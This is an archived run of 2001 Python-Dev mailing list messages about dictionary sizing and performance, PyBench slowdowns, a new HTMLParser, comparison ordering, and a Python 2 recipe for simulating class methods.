> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding out
performance issues about hot-spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least it gives
some good hints at where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries are usually within the 8-slot
range. You normally have a few heavyweight instances and
many lightweight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 17:05:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
             <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the best performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.
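A rough Python model of the allocation strategy under discussion: the first MINSIZE slots live in a buffer that is part of the object itself, and a separate buffer is only allocated when the table has to grow. This is an illustration, not MAL's patch; the class name, the MINSIZE of 8 (the size suggested above), the 2/3 load test, and the allocation counter are assumptions made for the sketch, and it tracks capacity only (no keys are stored).

```python
class InlineSlotTable(object):
    """Model of a hash table whose initial slot buffer is embedded in the
    object, so small tables never need a second allocation."""

    MINSIZE = 8  # assumed size of the embedded buffer

    def __init__(self):
        # In C this array would sit inside the object struct itself.
        self.smalltable = [None] * self.MINSIZE
        self.table = self.smalltable
        self.separate_allocations = 0  # counts simulated malloc calls

    def uses_inline_buffer(self):
        return self.table is self.smalltable

    def reserve(self, fill):
        """Double the size until a table of that size holds `fill`
        under the 2/3 load test."""
        size = len(self.table)
        while fill * 3 >= size * 2:
            size *= 2
        if size != len(self.table):
            # Only here does a separately allocated buffer come into play.
            self.separate_allocations += 1
            self.table = [None] * size
```

For example, `reserve(5)` leaves the table in its inline buffer, while `reserve(6)` moves it to a separately allocated 16-slot buffer.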

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Fri May 18 17:00:21 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benefit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake at acm.org  Fri May 18 17:12:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
	<200105181505.KAA16890@cj20424-a.reston1.va.home.com>
	<20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benefit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
 > usually not altered after creation ;-)

  The slots of tuples are already allocated inline, so I don't think
they'll get much better.  ;-)


-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Fri May 18 17:27:39 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:27:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200."
             <20010518170021.B16811@xs4all.nl> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>  
            <20010518170021.B16811@xs4all.nl> 
Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>

> > (I guess he means the buffer is alloc'ed contiguously with the dict
> > object head.  That's often a nice strategy.  Could do that for small
> > lists too maybe, except those haven't gotten anybody's attention just
> > yet.)
> 
> Sounds to me like it would benefit tuples even more than lists or dicts. At
> least in my code, I see more short tuples than short lists, and they are
> usually not altered after creation ;-)

Which is why tuples already have this feature.

Posted before your first cup of coffee? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Fri May 18 17:36:39 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 18 May 2001 17:36:39 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid>

guido wrote:
> A much improved HTML parser -- a replacement for sgmllib.  The API is
> derived from but not quite compatible with that of sgmllib, so it's a
> new file.  I suppose it needs documentation, and htmllib needs to be
> changed to use this instead of sgmllib, and sgmllib needs to be
> declared obsolete.

any reason this cannot be made compatible with sgmllib?

Cheers /F


From thomas at xs4all.net  Fri May 18 17:36:42 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:36:42 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com>
Message-ID: <20010518173642.S16791@xs4all.nl>

On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote:
> > > (I guess he means the buffer is alloc'ed contiguously with the dict
> > > object head.  That's often a nice strategy.  Could do that for small
> > > lists too maybe, except those haven't gotten anybody's attention just
> > > yet.)
> > 
> > Sounds to me like it would benefit tuples even more than lists or dicts. At
> > least in my code, I see more short tuples than short lists, and they are
> > usually not altered after creation ;-)
> 
> Which is why tuples already have this feature.
> 
> Posted before your first cup of coffee? :-)

No, after my last meeting, before my first witbier of the
Friday-afternoon-office-beer-binge :) TGIF ;)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido at digicool.com  Fri May 18 17:49:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 11:49:25 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1
In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200."
             <004401c0dfb0$57b7df00$e46940d5@hagrid> 
References: <E150lag-0007Ay-00@usw-pr-cvs1.sourceforge.net>  
            <004401c0dfb0$57b7df00$e46940d5@hagrid> 
Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com>

> guido wrote:
> > A much improved HTML parser -- a replacement for sgmllib.  The API is
> > derived from but not quite compatible with that of sgmllib, so it's a
> > new file.  I suppose it needs documentation, and htmllib needs to be
> > changed to use this instead of sgmllib, and sgmllib needs to be
> > declared obsolete.
> 
> any reason this cannot be made compatible with sgmllib?

The sgmllib API design has a few real bogosities.  I can't recall what
they were, but we looked into keeping it compatible, and it wasn't
worth the pain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May 18 18:57:34 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 12:57:34 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200."
             <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>  
            <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> 
Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com>

> According to the CVS log, this implementation of do_cmp was installed
> in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
> rationale for doing do_cmp in that order?

You can ask me directly, loewis. :-)

I believe that my thinking at the time was that tp_compare should only
be used as a final fallback, just before comparing by address.  This
was consistent with my desire to completely get rid of tp_compare.

But until that is done, I now agree that it makes more sense to try
tp_compare first when a three-way-compare is requested -- especially
in the light of sequence comparison.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 19:37:33 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 10:37:33 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <20010518103733.A22185@glacier.fnational.com>

M.-A. Lemburg wrote:
> FYI, I have a patch which inlines small dictionaries directly
> into the type object (rather than using malloc to allocate
> the slot buffer).

Would it be faster to inline an association table rather than a
hash table?

 Neil


From guido at digicool.com  Fri May 18 19:43:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 13:43:45 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT."
             <20010518103733.A22185@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com>  
            <20010518103733.A22185@glacier.fnational.com> 
Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>

> Would it be faster to inline an association table rather than a
> hash table?

What's an association table?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Fri May 18 20:15:59 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 18 May 2001 11:15:59 -0700
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>
Message-ID: <20010518111559.A22344@glacier.fnational.com>

Guido van Rossum wrote:
> What's an association table?

A table of keys and values.  Values are looked up by looping over
the table comparing each key until the correct one is found (i.e.
it's O(n) where n is the size of the table).  For Python, the cost
of doing compares probably outweighs the cost of doing the
hashing, even for small tables.

It's not clear to me though if it would be a win.  Assuming that
interned strings are the most common key, an association table with
four entries would take on average two pointer compares to look
up a value.

  Neil


From mal at lemburg.com  Fri May 18 20:15:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 20:15:37 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B0566C9.90F17DB1@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

There you go:

https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470
 
-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 20:23:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 14:23:55 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT."
             <20010518111559.A22344@glacier.fnational.com> 
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com>  
            <20010518111559.A22344@glacier.fnational.com> 
Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com>

> Guido van Rossum wrote:
> > What's an association table?
> 
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.
> 
> It's not clear to me though if it would be a win.  Assuming that
> interned strings are the most common key, an association table with
> four entries would take on average two pointer compares to look
> up a value.
> 
>   Neil

I see.  At the cost of yet another algorithm, of course.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From James_Althoff at i2.com  Fri May 18 21:10:11 2001
From: James_Althoff at i2.com (James_Althoff at i2.com)
Date: Fri, 18 May 2001 12:10:11 -0700
Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods)
Message-ID: <OF92F5AE57.7BB01157-ON88256A50.00672E1C@i2.com>

Python-dev'ers,

Pardon the intrusion, but Aahz Maruch suggested that I post this to the
python-dev list.  The message below illustrates "yet another class method
recipe" that Costas synthesized (and which I then modified very slightly)
from various posts following another discussion on python-list about class
methods (as we all await the "type/class healing" stuff some of you are
working on -- go team!).  This variant uses explicit "metaclasses" (defined
as regular classes) whose instances ("meta objects") point to class objects
(since they cannot *be* class objects in current Python).   Anyway, I think
the approach has some nice properties.

Best regards,

Jim


----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM -----

From:    James Althoff
To:      python-list at python.org
Date:    05/14/01 02:09 PM
Subject: Re: Simulating Class (was Re: Does Python have Class methods)

Costas writes:
>Ok, so after looking thru how Python works and comments from people, I
>came up with what I believe may be the best way to implement Class
>methods and Class variables.
>
><snip>
>
>Costas

I think this idea is quite good.  I would amend it very slightly by
suggesting the convention of defining *three* separate names in the
enclosing module:

1) the name of the enclosing class
2) the name of the singleton instance of the enclosing class
3) the name of the enclosed class

To support this, I would propose using a naming convention as below.

If one is interested in defining a class Spam, then use the following
names:

1) SpamMetaClass  -- names the enclosing class
2) SpamMeta  --  names a singleton instance of the enclosing class
3) Spam  --  names the enclosed class

Use the name SpamMetaClass when you need to derive a subclass of
SpamMetaClass, e.g.,

class SpecialSpamMetaClass(SpamMetaClass): pass

Use the name SpamMeta to invoke a class method, e.g.,

SpamMeta.aClassMethod()

Use the name Spam to make instances as usual, e.g.,

s = Spam()

(and to derive a subclass of Spam).

Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby
-- that is to say, the class Spam is not an instance of SpamMetaClass --
nonetheless, SpamMetaClass still acts as a "higher level" class that
provides methods on behalf of the class Spam where said methods are 1)
independent of any particular instance of Spam and 2) allow for
factory-method-style creation of Spam instances -- these being two very
important attributes of the metaclass concept.  Plus "meta" is a nice,
short name.  :-)   Plus using "MetaClass" to refer to the class and "Meta"
to refer to the singleton instance of "MetaClass" is reasonably clear and
succinct, I think.

One nice thing about the proposed recipe is that the SpamMeta object is a
real class instance of a real class.  This means that -- unlike when using
the "module function" recipe -- we get inheritance of methods, and --
unlike when using the "callable wrapper class" recipe -- we also get
override of methods.

The example below illustrates both of these important capabilities.


class Class1MetaClass:  # Base metaclass

    # Define "class methods" for Class1

    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    def new(self):  # Factory method
        """Return a new instance"""
        return self.Class1()

    def newList(self,n=3):  # Another factory method
        """Return a list of new instances"""
        l = []
        for i in range(n):
            newInstance = self.new()
            l.append(newInstance)
        return l

    # Define Class1 & its "instance methods"

    class Class1:  # Base class

        def whoami(self):
            print 'Class1.whoami:', self


Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass instance
Class1 = Class1Meta.Class1  # Make the Class1 name accessible


class Class2MetaClass(Class1MetaClass):  # Derived metaclass

    # Define "class methods" for Class2 -- Override Class1 "class methods"

    def whoami(self):
        print 'Class2MetaClass.whoami:', self

    def new(self):  # Override the factory method
        return self.Class2()

    # Define Class2 & its "instance methods"

    class Class2(Class1):  # Derived class

        def whoami(self):
            print 'Class2.whoami:', self

Class2Meta = Class2MetaClass()  # Make & name the singleton metaclass instance
Class2 = Class2Meta.Class2  # Make the Class2 name accessible


# Test

Class1Meta.whoami()  # invoke "class method" of base class
Class2Meta.whoami()  # invoke "class method" of derived class

Class1().whoami()  # make an instance & invoke "instance method"
Class2().whoami()

print Class1Meta.newList()  # factory method
print Class2Meta.newList()  # inherit factory method with override

>>> reload(meta6)
Class1MetaClass.whoami: <meta6.Class1MetaClass instance at 00810DBC>
Class2MetaClass.whoami: <meta6.Class2MetaClass instance at 00812D6C>
Class1.whoami: <meta6.Class1 instance at 0081058C>
Class2.whoami: <meta6.Class2 instance at 0081058C>
[<meta6.Class1 instance at 0081147C>, <meta6.Class1 instance at 0081151C>, <meta6.Class1 instance at 0081009C>]
[<meta6.Class2 instance at 0081147C>, <meta6.Class2 instance at 00810CCC>, <meta6.Class2 instance at 0081009C>]
<module 'meta6' from 'c:\_dev\python20\meta6.py'>
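For comparison only: Python 2.2 added a built-in classmethod, which expresses the same inherit-and-override pattern directly on the class (the @ decorator spelling used here needs 2.4 or later). This is a swapped-in technique, not part of the recipe above; the `created_by` attribute is purely illustrative.

```python
class Class1(object):
    @classmethod
    def new(cls):
        """Factory method: return an instance of whatever class it is called on."""
        return cls()

    @classmethod
    def new_list(cls, n=3):
        """Another factory method, built on new(); subclasses inherit it."""
        return [cls.new() for _ in range(n)]

    def whoami(self):
        return "Class1.whoami: %r" % (self,)


class Class2(Class1):
    @classmethod
    def new(cls):
        # Override the factory; the inherited new_list() picks this up via cls.
        instance = super(Class2, cls).new()
        instance.created_by = "Class2.new"  # illustrative marker only
        return instance

    def whoami(self):
        return "Class2.whoami: %r" % (self,)


print(Class1.new_list())
print(Class2.new_list())
```

As in the recipe, `new_list()` is written once and inherited, while the subclass's override of `new()` is what it ends up calling.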


Jim


From tim.one at home.com  Fri May 18 21:26:02 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:26:02 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B0509BF.A2F84A30@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEBGKDAA.tim.one@home.com>

[MAL]
> It [pybench] doesn't claim "typical use". pybench is aimed at finding
> out performance issues about hot-spots -- there's no such thing as
> a "typical program", so pybench gives you low level performance
> compares for very specific tasks, e.g. dictionary creation or
> for-loop performance.
>
> I have found it to be rather successful at that. At least it gives
> some good hints at where to look...

There must be a misunderstanding here.  I understand and appreciate all that!

From tim.one at home.com  Fri May 18 21:48:33 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 18 May 2001 15:48:33 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518111559.A22344@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBJKDAA.tim.one@home.com>

[Neil Schemenauer]
> A table of keys and values.  Values are looked up by looping over
> the table comparing each key until the correct one is found (i.e.
> it's O(n) where n is the size of the table).  For Python, the cost
> of doing compares probably outweighs the cost of doing the
> hashing, even for small tables.

I thought about that before.  The inlining appeals but the algorithm not
much:  the dict implementation *as is* loops over all the table entries too,
except that instead of starting with "i = 0" it starts (now) with "i = hash &
mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^=
poly"; and instead of giving up when "i >= length" it punts when finding an
entry with a null value.  Incrementing via ++i is certainly cheaper, except
that even when small, the hash table usually hits on the first try when the
key is present, so usually gets out before incrementing.
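The shift-and-XOR step described above can be tried in isolation. This sketch follows the simplified description in the message (the real lookdict code differs in detail) and assumes poly = 0b1011, i.e. x**3 + x + 1, a primitive polynomial of degree 3, for an 8-slot table (mask 7). With a primitive polynomial the step cycles through every nonzero index before repeating; in this simplified form a nonzero start never reaches index 0.

```python
def probe_sequence(start, mask, poly):
    """Indices visited by the step "i <<= 1; if (i > mask) i ^= poly",
    starting from `start`, until the sequence returns to `start`.
    Assumes poly has its x**0 bit set, so the step always cycles back."""
    visited = []
    i = start
    while True:
        visited.append(i)
        i <<= 1
        if i > mask:
            i ^= poly  # reduce modulo the polynomial, keeping i within mask
        if i == start:
            return visited


seq = probe_sequence(1, 7, 0b1011)
print(seq)  # [1, 2, 4, 3, 6, 7, 5]
```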

> It's not clear to me though if it would be a win.

Best guess is not.

> Assuming that interned strings are the most common key, an association
> table with four entries would take on average two pointer compares
> to look up a value.

Actually an average of 2.5 when the key is present and each key is equally
likely to be queried, and always 4 when the queried key is not present.  The
hash table has better expected stats on both counts, but needs 4 unused slots
too to achieve that.  The savings would be in memory for small dicts more
than in time (if at all).
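The 2.5 and 4 figures are easy to reproduce by counting key comparisons in a linear-scan association table. This is a hypothetical sketch (the AssocTable name and its compares counter are illustrative) that counts one comparison per key examined; the identity test comes first, standing in for the pointer compare that suffices for interned strings.

```python
class AssocTable(object):
    """Linear-scan association table: parallel lists of keys and values."""

    def __init__(self):
        self.keys = []
        self.values = []
        self.compares = 0  # keys examined by lookup() so far

    def __setitem__(self, key, value):
        for i, k in enumerate(self.keys):
            if k is key or k == key:
                self.values[i] = value
                return
        self.keys.append(key)
        self.values.append(value)

    def lookup(self, key, default=None):
        for k, v in zip(self.keys, self.values):
            self.compares += 1
            # Identity first (the cheap pointer compare), then equality.
            if k is key or k == key:
                return v
        return default


table = AssocTable()
names = ["a", "b", "c", "d"]
for n, name in enumerate(names):
    table[name] = n

for name in names:            # each present key queried once
    table.lookup(name)
print(table.compares / 4.0)   # 2.5

table.compares = 0
table.lookup("missing")
print(table.compares)         # 4: an absent key examines every entry
```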


From jeremy at alum.mit.edu  Fri May 18 23:07:37 2001
From: jeremy at alum.mit.edu (Jeremy Hylton)
Date: Fri, 18 May 2001 17:07:37 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
Message-ID: <200105182107.RAA16214@cliff.concentric.net>

I did some profiles of more of the pybench slowdowns this afternoon
and found a few causes for several problem benchmarks.

I just made a couple of small changes for BuiltinFunctionCalls.  The
problem here is that PyCFunction calls were optimized for flags == 0
and not flags == METH_VARARGS, which is more common.

The scary thing about BuiltinFunctionCalls is that the profiler shows
it spending almost 30% of its time in PyArg_ParseTuple().  It
certainly is a shame that we have this complicated, slow run-time
parsing mechanism to deal with a static property of the code, namely
how many arguments it takes and what their types are.

A few of the other tests, SimpleComplexArithmetic and
CreateStringsWithConcat, are slower because of the new coercion
logic.  I didn't spend much time on SimpleComplexArithmetic, but I did
look at CreateStringsWithConcat in some detail.  The basic problem is
that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls
PyNumber_Add("ab", "cd").  This function tries all sorts of different
ways to coerce the strings into addable numbers before giving up and
trying sequence concat.

It looks like the new coercion rules have optimized number ops at the
expense of string ops.  If you're writing programs with lots of
numbers, you probably think that's peachy.  If you're parsing HTML,
perhaps you don't :-).

I looked at the test suite to see how often it is called with
non-number arguments.  The answer is 77% of the time, but almost all
of those calls are from test_unicodedata.  If that one test is
excluded, the majority of the calls (~90%) are with numbers.  But the
majority of those calls just come from a few tests -- test_pow,
test_long, test_mutants, test_strftime.

If I were to do something about the coercions, I would see if there
was a way to quickly determine that PyNumber_Add() ain't gonna have
any luck.  Then we could bail to things like string_concat more
quickly.

I also looked at SmallLists.  It seems that the only significant
change since 1.5.2 is the garbage collection.  This test spends a lot
more time deallocating lists than it used to, and the only change I
see in the code is the GC.  I assume, but haven't checked, that the
story is similar for SmallTuples.

So the primary things that have slowed down since 1.5.2 seem to be:
comparisons, coercion, and memory management for containers.  These
also seem to be the things that have improved the most in terms of
features, completeness, etc.  Looks like we need to revisit them and
sort out the performance issues.

Jeremy


From guido at digicool.com  Fri May 18 23:58:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 17:58:25 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT."
             <200105182107.RAA16214@cliff.concentric.net> 
References: <200105182107.RAA16214@cliff.concentric.net> 
Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>

> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

I would love to see a mechanism whereby the signature of a C function
could be stored as part of the static info about it, in an extension
of the PyMethodDef structure: this would serve as documentation, allow
for introspection, etc.  I'm sure Ping would love this for pydoc and
his inspect module.

But I'm not sure how much we can speed things up, unless we give up on
the tuple interface (an argc/argv API could be much faster since
usually the arguments are already on the frame's stack in this form).

